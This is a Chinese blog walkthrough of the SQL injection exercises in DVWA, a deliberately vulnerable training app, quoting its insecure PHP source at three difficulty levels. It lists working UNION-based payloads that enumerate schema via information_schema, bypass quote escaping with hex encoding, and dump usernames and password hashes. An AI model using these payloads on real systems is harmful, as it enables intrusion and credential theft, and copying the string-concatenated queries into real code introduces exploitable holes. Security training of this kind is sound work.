DVWA通关之SQL Injection

于 2021-08-06 19:19:38 发布
阅读量100 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47912094/article/details/119306881
版权

SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。
在这里插入图片描述

Low:

源码分析一下:

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
//获取ID字段
    $id = $_REQUEST[ 'id' ];

    // Check database
//拼接SQL语句并查询
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    mysqli_close($GLOBALS["___mysqli_ston"]);
}

?>

可以看到,low级别代码对来自客户端的参数id没有进行任何的检查和过滤,存在明显的SQL注入。

判断是否存在注入,注入是字符型还是数字型;
在这里插入图片描述
输入1’or’1’=‘1,查询成功;
在这里插入图片描述
输入1’and’1’='2,查询失败,返回结果为空;
在这里插入图片描述
说明存在字符型注入。

通过order by猜解字段数量
输入1‘or 1=1 order by 1 # ,查询成功;
在这里插入图片描述
输入1’or 1=1 order by 2 #,查询成功;
在这里插入图片描述
继续输入,1’or 1=1 order by 3 #,查询失败;
在这里插入图片描述
说明执行的SQL查询语句中只有两个字段,这里就是First name,Surname。这里也可以通过输入union select 1,2,3…来猜解字段数;
输入1’ union select 1,2 #,查询成功。
在这里插入图片描述
查找当前的数据库以及版本1’ union select version(),database()#,查询成功。
在这里插入图片描述
获取数据库中的表
输入1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #,查询成功。
在这里插入图片描述
当前数据库有两个表,guestbook,users;

获取users表中的字段名
输入 1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’ #,查询成功。
在这里插入图片描述
表中共有八个字段,分别是user_id,first_name,last_name,_user,password,avatar,last_login,failed_login;

获取字段中的数据1’ union select user,password from users#
在这里插入图片描述

Medium:

源码分析一下:

<?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];

//user中x00,n,r,,’,”,x1a转义,防SQL注入
    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Display values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);

可以看到用了下拉选择菜单;
并且对参数使用mysql_real_escape_string函数转义sql语句中特殊字符如’ ‘’ / 空字符,查看sql查询语句可以看出可能存在数字型sql注入。

虽然前端使用了下拉选择菜单,但是依然可以通过抓包修改参数,提交恶意构造的查询参数。

存在注入并且注入类型为数字型:
在这里插入图片描述
猜解字段数,得到字段个数为2:
在这里插入图片描述
在这里插入图片描述
确定回显位置,1 union select 1,2#:
在这里插入图片描述
获取当前数据库及版本1 union select database(),version()#:
在这里插入图片描述

获取数据库中的所有表1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#:
在这里插入图片描述
获取表中的所有字段,由于单引号被转义,'users’无法执行,可以利用16进制进行绕过
1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #:
在这里插入图片描述
获取字段中的数据1 union select user,password from users#:
在这里插入图片描述

High:

源码分析一下:

<?php

if( isset( $_SESSION [ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);        
}

?>

High级别的,点击”here to change your ID”,页面自动跳转,防御了自动化的sql注入(sqlmap),在SQL查询语句中添加了LIMIT 1,希望以此控制只输出一个结果,对参数没有做防御。

步骤和前面几乎一样;
直接最后一步:
直接输入1’ union select user,password from users#获得密码;
在这里插入图片描述
在这里插入图片描述

CoOlCoKeZ
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值